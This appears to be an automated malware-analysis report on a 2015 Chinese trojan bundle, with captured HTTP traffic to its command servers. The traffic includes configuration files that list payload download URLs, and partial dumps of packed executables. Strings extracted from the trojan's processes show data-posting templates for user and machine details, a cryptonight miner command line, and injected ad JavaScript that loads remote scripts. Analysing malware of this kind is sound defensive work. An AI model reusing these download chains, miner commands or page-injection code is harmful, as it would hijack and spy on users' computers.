name="neda,eda,ChannelEda" type="EDA">....<sys type="x86">.....<file>nclound32.zip</file>.....<down>hXXp://down.awangba.com.cn/proj/nclound32.zip</down>.....<md5>41FE0E8A5A889DB45241081868D75407</md5>.....<param&
<<< skipped >>>
GET /m137390001.xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: user.awangba.com.cn
Connection: Keep-Alive
HTTP/1.0 200 OK
Server: nginx
Date: Fri, 27 Mar 2015 20:46:54 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 462
Last-Modified: Fri, 27 Mar 2015 09:41:55 GMT
ETag: "551525e3-1ce"
Accept-Ranges: bytes
Age: 70720
X-Cache: HIT from ctzjjhs1
Via: 1.0 ctzjjhs1 (squid)
Connection: keep-alive
<?xml version="1.0" encoding="UTF-8"?>.<UserInfo autoPlayTime="20141130">. <item type="10511">. <MainPageID>sg7844</MainPageID>. <OutGameID/>. <OutGame2ID>100412</OutGame2ID>. <OutGame3ID/>. <SGTPID/>. <eda>108611</eda>. <gda/>. <BlackUrl/>. <f>0</f>. <s>0</s>. <q>1</q>. <c>1</c>. <d>1</d>. <area>dt_one</area>. <ycgg>100412</ycgg>. <cq>1</cq>. <kjqt>300084</kjqt>. <dbt>100412</dbt>. </item>.</UserInfo>.HTTP/1.0 200 OK..Server: nginx..Date: Fri, 27 Mar 2015 20:46:54 GMT..Content-Type: text/xml; charset=utf-8..Content-Length: 462..Last-Modified: Fri, 27 Mar 2015 09:41:55 GMT..ETag: "551525e3-1ce"..Accept-Ranges: bytes..Age: 70720..X-Cache: HIT from ctzjjhs1..Via: 1.0 ctzjjhs1 (squid)..Connection: keep-alive..<?xml version="1.0" encoding="UTF-8"?>.<UserInfo autoPlayTime="20141130">. <item type="10511">. <MainPageID>sg7844</MainPageID>. <OutGameID/>. <OutGame2ID>100412</OutGame2ID>. <OutGame3ID/>. <SGTPID/>. <eda>108611</eda>. <gda/>. <BlackUrl/>. <f>0</f>. <s>0</s>. <q>1</q>. <c>1</c>. <d>1</d>. <area>dt_one</area>. <ycgg>100412</ycgg>.
<<< skipped >>>
GET /IP.aspx HTTP/1.1
User-Agent: AutoIt
Host: ipaddress.wb916.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 06 Apr 2015 01:53:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49
[......]........=37.57.16.189........=...........HTTP/1.1 200 OK..Date: Mon, 06 Apr 2015 01:53:43 GMT..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..X-AspNet-Version: 4.0.30319..Cache-Control: private..Content-Type: text/html; charset=utf-8..Content-Length: 49..[......]........=37.57.16.189........=.............
GET /updata/adclient/client/szicoad.exe HTTP/1.1
Range: bytes=0-
Unless-Modified-Since: Fri, 27 Mar 2015 18:31:32 GMT
If-Range: "1DDF4CC1188804E8670E9CA6139C2FED"
User-Agent: AutoIt
Host: down04.kuaibu8.com
HTTP/1.1 206 Partial Content
Date: Mon, 06 Apr 2015 01:53:35 GMT
Content-Type: application/x-msdownload
Content-Length: 389558
Connection: close
Accept-Ranges: bytes
Content-Range: bytes 0-389557/389558
ETag: "1DDF4CC1188804E8670E9CA6139C2FED"
Last-Modified: Fri, 27 Mar 2015 18:31:32 GMT
Server: AliyunOSS
x-oss-request-id: 5521E71F957EEBB6599ED681
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9jUt}.;'}.;'}.;'.E.'..;'f..'..;'f..'H.;'ts.'t.;'ts.'\.;'}.:'j.;'f..'7.;'f..'J.;'f..'|.;'}..'|.;'f..'|.;'Rich}.;'........................PE..L....z.O..........#.......... ...`..@....p... ....@..........................@................@.......@.............................. ..............................................................................................................UPX0.....`..............................UPX1.........p......................@....rsrc.... ... ......................@......................................................................................................................................................................................................................................................................................................................................................................3.08.UPX!....!|..wP......<.......&..S...............F......!g?....*v V3.......$=.G....Q....rF...;w.r.^..
GET /proj/BackEnd.ini HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: domain.awangba.com.cn
Connection: Keep-Alive
HTTP/1.0 200 OK
Server: nginx
Date: Sun, 05 Apr 2015 05:40:09 GMT
Content-Type: application/octet-stream
Content-Length: 477
Last-Modified: Wed, 25 Mar 2015 02:18:43 GMT
ETag: "55121b03-1dd"
Accept-Ranges: bytes
Age: 72797
X-Cache: HIT from ctzjjhs1
Via: 1.0 ctzjjhs1 (squid)
Connection: keep-alive
[config]..run=yes..cudp=19034..sudp=19033..stcp1=19042..stcp2=19048..bguid=F3450EDC-EAF6-BCE5-BEC8-25CF003FE045..path=%temp%\downt..seed=AplusFile.bt..extparam=com..[x86]..name=BackEnd32.zip..url=hXXp://down.awangba.com.cn/proj/BackEnd32.zip..md5=2E2642D3D4568793E2699EAE74370D2E..path=%temp%\downt..param=comdhost.exe..[x64]..name=BackEnd64.zip..url=hXXp://down.awangba.com.cn/proj/BackEnd64.zip..md5=C6B9ABFB262D1DD8DD75243165020C08..path=%temp%\downt..param=comdhost.exeHTTP/1.0 200 OK..Server: nginx..Date: Sun, 05 Apr 2015 05:40:09 GMT..Content-Type: application/octet-stream..Content-Length: 477..Last-Modified: Wed, 25 Mar 2015 02:18:43 GMT..ETag: "55121b03-1dd"..Accept-Ranges: bytes..Age: 72797..X-Cache: HIT from ctzjjhs1..Via: 1.0 ctzjjhs1 (squid)..Connection: keep-alive..[config]..run=yes..cudp=19034..sudp=19033..stcp1=19042..stcp2=19048..bguid=F3450EDC-EAF6-BCE5-BEC8-25CF003FE045..path=%temp%\downt..seed=AplusFile.bt..extparam=com..[x86]..name=BackEnd32.zip..url=hXXp://down.awangba.com.cn/proj/BackEnd32.zip..md5=2E2642D3D4568793E2699EAE74370D2E..path=%temp%\downt..param=comdhost.exe..[x64]..name=BackEnd64.zip..url=hXXp://down.awangba.com.cn/proj/BackEnd64.zip..md5=C6B9ABFB262D1DD8DD75243165020C08..path=%temp%\downt..param=comdhost.exe..
<<< skipped >>>
GET /dyndns/getip HTTP/1.1
User-Agent: APlus
Host: VVV.3322.org
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Apr 2015 01:53:50 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Content-Type: text/plain; charset=utf-8
d..37.57.16.189...0..
GET /proj/BackEnd32.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.awangba.com.cn
Connection: Keep-Alive
HTTP/1.0 200 OK
Server: nginx
Date: Wed, 25 Mar 2015 02:30:13 GMT
Content-Type: application/zip
Content-Length: 171307
Last-Modified: Wed, 25 Mar 2015 02:16:54 GMT
ETag: "55121a96-29d2b"
Accept-Ranges: bytes
Age: 3001
X-Cache: HIT from ctzjtzs1
Via: 1.0 ctzjtzs1 (squid)
Connection: keep-alive
PK.........TxF5..y}...........comdhost.exe..}|T..8..S.K...,.5B..h...5q...n...} .($A.4Mm...P..7.{3\.-.M[.[[..J[..0V.,... ..b.j.R.....!..~...w.y..y.>..^?4{..;...3g.93s....u..F.1._<..4h..B...G.o.....l.........<..;K../....<...o=.... .....K..g......x.......{.......7......y..:.3.>c.Y.j.z^.d.e.N........k..Nv]9....bW.w.U.p....k4..)....25..F....k4E:......i5.3.,.q*.=..h...z.,.3.].....kXF...&.....:^D.^S`.......7j4...4Y....?.....Y..z........h..#.u.W~6@.{.c....h..R...........y6Mc........{@....,].-.gu.:kR... ..<... ...9.4w p.. .z.....o.E...(..G..j...2..#....J_...vA......>..@. .w.x^%....%m......$.....X.T.E..4s...O.jH'....$..^X.....w...Mu..C....b...}...XW?:...~.>l?.v^(.d....Z..7'...'.....4.....)..X.....&Q...}..c.rZ...._Z.RMg..<.8....`=.|Po...,.Y...........o....i...}z......k....cS......O.4.35.p85\...t.f}..........~.6"~.xRa...."t{r..=..pj0jp..e=...g....g../...y>/...~oc....t.k?......?1..K....vh..`..h]....={%.'....9U#.......=b7...]..Mt.....&....h@.7..Ke../-~.I..sF..S..........C!.2.c.SB...H.%.m^b .1.i..-.Oz$>...vx.m.f&..m>.%..:,..4....9...,...Z.W...i..-..z.0..>Z..$........d..1..xFZm.v...!....iF........s..F..2.I.\.<5.r...._.S.....KK..v#&f.$.. .#]..b.l..l.....i...epS........Z.;..l./.........S-KtdH...d.T.v..gJu....PIs%<).~.>....Vl..X...OI...r.G:...h.k<G......_1.......B...]......../......f.?........A .._=S.....b....a.X.a11p...4.}..0C...R....|.8.o......a.E..x.P....@F >.7x.Ym...G.v.............z.(.Hf.-7...0..F..l."a......S..*,,.<.2.. ....._6~R....%..=..@#=.I.FR#.!...W.,3...........
<<< skipped >>>
GET /server/server.txt HTTP/1.1
User-Agent: AutoIt
Host: gengxin.kuaibu8.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 06 Apr 2015 01:53:44 GMT
Content-Type: text/plain
Content-Length: 861
Connection: close
Accept-Ranges: bytes
ETag: "5F518A33E3525F232868CB7B8D966762"
Last-Modified: Wed, 01 Apr 2015 16:00:47 GMT
Server: AliyunOSS
x-oss-request-id: 5521E728B7EB447F466C7227
[File]..kuaibu8=hXXp://VVV.kuaibu8.com/iniuser/..uc916=hXXp://VVV.uc916.com/iniuser/..szicoad=hXXp://VVV.kuaibu8.com:8089/ico/..minyang=http://mingyangdown.oss-cn-qingdao.aliyuncs.com/userini/..[update]..Startupdate=yes..kuaibu8=kuaibu8..szicoad=szicoad..minyang=minyang..uc916=uc916..[server]..01=down04.kuaibu8.com..02=down04.kuaibu8.com..03=down04.kuaibu8.com..04=down04.kuaibu8.com..05=down04.kuaibu8.com..06=down04.kuaibu8.com..07=down04.kuaibu8.com..08=down04.kuaibu8.com..09=down04.kuaibu8.com..10=down04.kuaibu8.com..[dllhost]..yewu01=/updata/adclient/ie/ieadd.dll..yewu02=/updata/adclient/cpu/cpu.dll..yewu03=/updata/adclient/sohu/sohuvip.dll..yewu04=/updata/adclient/kbts/kbts.dll..yewu05=/updata/adclient/pcfen/pcfen.dll..yewu06=/updata/adclient/desk/desk1.exe..yewu07=/updata/adclient/iejs/iejs.dll..yewu99=/updata/adclient/yileyou/yileyou.dll..
GET /updata/adclient/client/szicoad.exe HTTP/1.1
User-Agent: AutoIt
Host: down04.kuaibu8.com
HTTP/1.1 200 OK
Date: Mon, 06 Apr 2015 01:53:33 GMT
Content-Type: application/x-msdownload
Content-Length: 389558
Connection: close
Accept-Ranges: bytes
ETag: "1DDF4CC1188804E8670E9CA6139C2FED"
Last-Modified: Fri, 27 Mar 2015 18:31:32 GMT
Server: AliyunOSS
x-oss-request-id: 5521E71D51235893A88ED225
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9jUt}.;'}.;'}.;'.E.'..;'f..'..;'f..'H.;'ts.'t.;'ts.'\.;'}.:'j.;'f..'7.;'f..'J.;'f..'|.;'}..'|.;'f..'|.;'Rich}.;'........................PE..L....z.O..........#.......... ...`..@....p... ....@..........................@................@.......@.............................. ..............................................................................................................UPX0.....`..............................UPX1.........p......................@....rsrc.... ... ......................@......................................................................................................................................................................................................................................................................................................................................................................3.08.UPX!....!|..wP......<.......&..S...............F......!g?....*v V3.......$=.G....Q....rF...;w.r.^.G...awVW4.....K...........S&......,.I'....<..P...|C|(v..#.\...DQ.`..`.~.._.L.^...._....lp(...V...=-.i..0.^.h....7..L,o...U..3.........&8...J.tNh..P..\..R.....'....................X<Qj.........;.c.`\....tH..]9.....F$S3.;.`..9...,.^$.^0.4...78.^.[o>.E..M..U.W.....}.PQR..._]...?...S.]..f..V;.7.......t....i...&....r.6...O.r)...v{.@....*...........;=....|.K^.u..VRWS....f.v^[....E.h..JC.....<.l.1a....@.i8....._...r......G,..w....y.$.
<<< skipped >>>
GET /IP.aspx HTTP/1.1
User-Agent: AutoIt
Host: ipaddress.wb916.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 06 Apr 2015 01:53:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49
[......]........=37.57.16.189........=...........
GET /server/server.txt HTTP/1.1
User-Agent: AutoIt
Host: gengxin.kuaibu8.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 06 Apr 2015 01:53:25 GMT
Content-Type: text/plain
Content-Length: 861
Connection: close
Accept-Ranges: bytes
ETag: "5F518A33E3525F232868CB7B8D966762"
Last-Modified: Wed, 01 Apr 2015 16:00:47 GMT
Server: AliyunOSS
x-oss-request-id: 5521E715A97F0D894E6C866D
[File]..kuaibu8=hXXp://VVV.kuaibu8.com/iniuser/..uc916=hXXp://VVV.uc916.com/iniuser/..szicoad=hXXp://VVV.kuaibu8.com:8089/ico/..minyang=http://mingyangdown.oss-cn-qingdao.aliyuncs.com/userini/..[update]..Startupdate=yes..kuaibu8=kuaibu8..szicoad=szicoad..minyang=minyang..uc916=uc916..[server]..01=down04.kuaibu8.com..02=down04.kuaibu8.com..03=down04.kuaibu8.com..04=down04.kuaibu8.com..05=down04.kuaibu8.com..06=down04.kuaibu8.com..07=down04.kuaibu8.com..08=down04.kuaibu8.com..09=down04.kuaibu8.com..10=down04.kuaibu8.com..[dllhost]..yewu01=/updata/adclient/ie/ieadd.dll..yewu02=/updata/adclient/cpu/cpu.dll..yewu03=/updata/adclient/sohu/sohuvip.dll..yewu04=/updata/adclient/kbts/kbts.dll..yewu05=/updata/adclient/pcfen/pcfen.dll..yewu06=/updata/adclient/desk/desk1.exe..yewu07=/updata/adclient/iejs/iejs.dll..yewu99=/updata/adclient/yileyou/yileyou.dll
<<< skipped >>>
GET /updata/adclient/client/szicoad.exe HTTP/1.1
User-Agent: AutoIt
Host: down04.kuaibu8.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 06 Apr 2015 01:53:36 GMT
Content-Type: application/x-msdownload
Content-Length: 389558
Connection: close
Accept-Ranges: bytes
ETag: "1DDF4CC1188804E8670E9CA6139C2FED"
Last-Modified: Fri, 27 Mar 2015 18:31:32 GMT
Server: AliyunOSS
x-oss-request-id: 5521E720CF90B15A28922240
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9jUt}.;'}.;'}.;'.E.'..;'f..'..;'f..'H.;'ts.'t.;'ts.'\.;'}.:'j.;'f..'7.;'f..'J.;'f..'|.;'}..'|.;'f..'|.;'Rich}.;'........................PE..L....z.O..........#.......... ...`..@....p... ....@..........................@................@.......@.............................. ..............................................................................................................UPX0.....`..............................UPX1.........p......................@....rsrc.... ... ......................@......................................................................................................................................................................................................................................................................................................................................................................3.08.UPX!....!|..wP......<.......&..S...............F......!g?....*v V3.......$=.G....Q....rF...;w.r.^.G...awVW4.....K...........S&......,.I'....<..P...|C|(v..#.\...DQ.`..`.~.._.L.^...._....lp(...V...=-.i..0.^.h....7..L,o...U..3.........&8...J.tNh..P..\..R.....'....................X<Qj.........;.c.`\....tH..]9.....F$S3.;.`..9...,.^$.^0.4...78.^.[o>.E..M..U.W.....}.PQR..._]...?...S.]..f..V;.7.......t....i...&....r.6...O.r)...v{.@....*...........;=....|.K^.u..VRWS....f.v^[....E.h..JC.....<.l.1a....@.i8....._...r......G,..w....y.$.
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
bv.exe_464:
.text
`.rdata
@.data
.rsrc
CCmdTarget
%*.*f
commctrl_DragListMsg
COMCTL32.DLL
CNotSupportedException
MSWHEEL_ROLLMSG
ole32.dll
__MSVCRT_HEAP_SELECT
user32.dll
WS2_32.dll
WinExec
GetCPInfo
KERNEL32.dll
ExitWindowsEx
SetWindowsHookExA
GetKeyState
CreateDialogIndirectParamA
UnhookWindowsHookEx
USER32.dll
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GDI32.dll
comdlg32.dll
WINSPOOL.DRV
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
ADVAPI32.dll
SHELL32.dll
COMCTL32.dll
oledlg.dll
OLEPRO32.DLL
OLEAUT32.dll
iphlpapi.dll
%s\%s
explorer.exe
wbz1.exe
byteFirewall.dat
x-x-x-x-x-x
3.3.3.3
.?AVCCmdTarget@@
.PAVCException@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCResourceException@@
.PAVCMemoryException@@
.PAVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCOleException@@
.PAVCOleDispatchException@@
.PAVCFileException@@
zcÃ
windows
KERNEL32.DLL
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\bv.exe
h.rdata
H.data
.pdata
.reloc
TransportAddress
%d.%d.%d.%d
e:\bvaccdriver\tdi_hook_demo0828\objfre_win7_amd64\amd64\tdihook.pdb
ntoskrnl.exe
TDI.SYS
Thawte Certification1
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
hXXps://VVV.verisign.com/cps0*
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
e:\bvaccdriver\tdi_hook_demo0828\objfre_wxp_x86\i386\tdihook.pdb
HAL.dll
1, 0, 0, 1
ByteFirewall.EXE
\Device\Udp
\Device\Tcp
\Driver\Tcpip
(*.*)
comdhost.exe_424:
.text
`.rdata
@.data
.rsrc
@.reloc
X;
%s>
%s='%s'
%s="%s"
standalone="%s"
encoding="%s"
version="%s"
operator
GetProcessWindowStation
tongji.wangbax.cn
Content-Type: application/x-www-form-urlencoded
VVV.3322.org
msvcr32.dll
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%s%s%s
127.0.0.1
awangba.com
user=%s&id=%s&pw=%s&type=%s&run=%s&ip=%s&mac=%s&sysinfo=%s&client=e.%d
user=%s&id=%s&pw=%s&type=%s&ip=%s&mac=%s&sysinfo=%s&client=e
ProjPack.xml
hXXp://domain.awangba.com.cn/config.xml
plusconfig.xml
cudp
sudp
AplusFile.bt
stcp1
stcp2
00:00:00:00:00:00
X:X:X:X:X:X
SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003
Microsoft Windows Server 2003 R2
M-d-d%s
\\.\pipe\wangbax
Z:\svn\trunk\Develop\APlusClient\Win32\Release\BackEnd32.pdb
CreateNamedPipeA
ConnectNamedPipe
DisconnectNamedPipe
KERNEL32.dll
USER32.dll
RegOpenKeyA
RegEnumKeyExA
RegCloseKey
ADVAPI32.dll
WS2_32.dll
SHLWAPI.dll
HttpOpenRequestA
HttpAddRequestHeadersA
HttpSendRequestA
HttpQueryInfoA
WININET.dll
URLDownloadToFileA
urlmon.dll
PSAPI.DLL
IPHLPAPI.DLL
GetCPInfo
GetProcessHeap
zcÃ
.?AVCMd5@@
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\comdhost.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\downt\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\downt
F3450EDC-EAF6-BCE5-BEC8-25CF003FE045
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\downt\AplusFile.bt
1$1)1014191
8,888\8|8
9 9$9,9@9\9`9
nKERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
1.0.0.2
BackEnd.exe
1.120.1.3241
brocount.exe_1764:
.text
`.rdata
@.data
.rsrc
@.reloc
operator
GetProcessWindowStation
tongji.wangbax.cn
Content-Type: application/x-www-form-urlencoded
awangba.com
id=%s&mac=%s&brower=%s&user=%s&pw=%s
SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\
X:X:X:X:X:X
M-d-d%s
Z:\svn\trunk\Develop\APlusClient\Release\CountBro.pdb
KERNEL32.dll
USER32.dll
RegOpenKeyA
RegEnumKeyExA
RegCloseKey
ADVAPI32.dll
HttpOpenRequestA
HttpAddRequestHeadersA
HttpSendRequestA
HttpQueryInfoA
WININET.dll
GetCPInfo
iexplore.exe
360se.exe
360chrome.exe
2345Explorer.exe
QQBrowser.exe
TTraveler.exe
f1browser.exe
Tango3.exe
2291Browser.exe
chrome.exe
firefox.exe
baidubrowser.exe
SogouExplorer.exe
miniie.exe
win-ie.exe
TheWorld.exe
twchrome.exe
.?AVCMd5@@
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\brocount.exe
nKERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
1.0.0.1
1.147.1.3131
svchost.exe_1284:
.text
`.rdata
@.data
.rsrc
@.reloc
operator
GetProcessWindowStation
tongji.wangbax.cn
Content-Type: application/x-www-form-urlencoded
VVV.3322.org
9ACDDBD0-4236-4127-CCCC-B00F6AA7AB33
00:00:00:00:00:00
X:X:X:X:X:X
SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003
Microsoft Windows Server 2003 R2
M-d-d%s
127.0.0.1
awangba.com
pw=%s&id=%s&user=%s&type=%s&mac=%s&cpun=%d&cpux=%d&sysinfo=%s&ip=%s&worker=%d
taskmgr.exe
mssrv.exe
%s -a cryptonight -o %s -u %s -p x -t %d
hXXp://tongji.wangbax.cn/eda/cpuConfig
apluscpuconfig.ini
%s_%s
getEdaAddress.awangba.com
type=cpu&version=cpu1.0&user=%s&son=%s&pw=%s&osbit=%d&client=1.0.0
Z:\svn\trunk\Develop\CPUClient\Win32\Release\BootKit32.pdb
KERNEL32.dll
USER32.dll
RegOpenKeyExA
RegCloseKey
RegOpenKeyA
RegEnumKeyExA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
HttpOpenRequestA
HttpAddRequestHeadersA
HttpSendRequestA
HttpQueryInfoA
WININET.dll
URLDownloadToFileA
urlmon.dll
PSAPI.DLL
IPHLPAPI.DLL
GetCPInfo
.?AVCMd5@@
37.57.16.189
zcÃ
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\svchost.exe
2=3
? ?$?,?@?`?|?
mscoree.dll
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
1.112.1.11111
BootKit.exe
1.0.0.9
FC.exe_1516:
.text
`.rdata
@.data
.rsrc
@.reloc
operator
GetProcessWindowStation
M-d-d%s
awangba.com
Z:\svn\trunk\Develop\yxjgg\Release\slyxj.pdb
KERNEL32.dll
USER32.dll
RegOpenKeyW
RegEnumKeyExW
RegCloseKey
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
HttpOpenRequestW
HttpAddRequestHeadersW
HttpSendRequestW
HttpQueryInfoW
WININET.dll
URLDownloadToFileW
urlmon.dll
IPHLPAPI.DLL
GetCPInfo
.?AVCMd5@@
11D1j1
1,2
3 3$3(3|3
mscoree.dll
KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
tongji.wangbax.cn
Content-Type: application/x-www-form-urlencoded
X:X:X:X:X:X
SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\
/client/yxjKey?user=
/client/dbKey?user=
yxj.config
hXXp://domain.awangba.com.cn/yxj/config.xml
if (!document.body) return setTimeout(arguments.callee, 50);
var adpro= document.createElement('script');
adpro.type = 'text/javascript';
adpro.text = '_adpro_pub= "
adpro.text = '_adpro_slot= "
document.body.insertBefore(adpro, document.body.children.item(0));
adpro.src = 'hXXp://m.adpro.cn/adpro.js';
adpro.src = 'hXXp://tz.awangba.com.cn/a.js';
var yxj= document.createElement('div');
yxj.id='yxjgg';
document.body.appendChild(yxj);
id=%s&mac=%s&type=%s&user=%s&pw=%s
192.168.
.baidu.com
.hao123.com
.google.com
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\FC.exe
1.0.0.1
1.141.1.3021
mp.exe_1552:
.text
`.rdata
@.data
.rsrc
@.reloc
operator
GetProcessWindowStation
Z:\mysvn\trunk\NewMainPage\Release\NewMainPage.pdb
KERNEL32.dll
EnumChildWindows
MapVirtualKeyW
keybd_event
USER32.dll
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
URLDownloadToFileW
urlmon.dll
GetCPInfo
1*2024282
5 5$5(5,5054585
AKERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
ntdll.dll
kernel32.dll
OLEACC.DLL
mp.ini
hXXp://domain.awangba.com.cn/mp/mp.ini
hXXp://123.sogou.com/?71090-1234
hXXp://123.sogou.com/?71049-
hXXp://123.sogou.com/?71090-
hXXp://VVV.duba.com/?un_367393_
hXXp://VVV.sogou.com/index.htm?pid=sogou-netb-38181d991caac98b-
lockmp.dll
explorer.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\mp.exe
1.0.0.1
1.119.1.3171
300084.exe_256:
.text
`.rdata
@.data
.aspack
.adata
inflate 1.1.3 Copyright 1995-1998 Mark Adler
MFC42.DLL
MSVCRT.dll
_acmdln
KERNEL32.dll
USER32.dll
RegCloseKey
RegCreateKeyA
RegOpenKeyExA
ADVAPI32.dll
SHELL32.dll
MSVCP60.dll
iphlpapi.dll
InternetCrackUrlA
WININET.dll
WS2_32.dll
.\config.ini
%s\config.ini
iexplore.exe
.PAVCInternetException@@
1.1.3
%s%s%s
255.255.255.255
%s?%u
%s.crc?%u
"%s" %s
%s\%s
main.exe
%s\run.ini
X:X:X:X:X:X
center.pcdogs.info
center.boxlist.info
center.oldlist.info
X%sX%sX%sX%sX%sX
kernel32.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
mfc42.dll
msvcrt.dll
advapi32.dll
shell32.dll
msvcp60.dll
wininet.dll
ws2_32.dll
300084.exe_256_rwx_00410000_00003000:
kernel32.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
mfc42.dll
msvcrt.dll
advapi32.dll
shell32.dll
msvcp60.dll
iphlpapi.dll
wininet.dll
ws2_32.dll
RegCloseKey
InternetCrackUrlA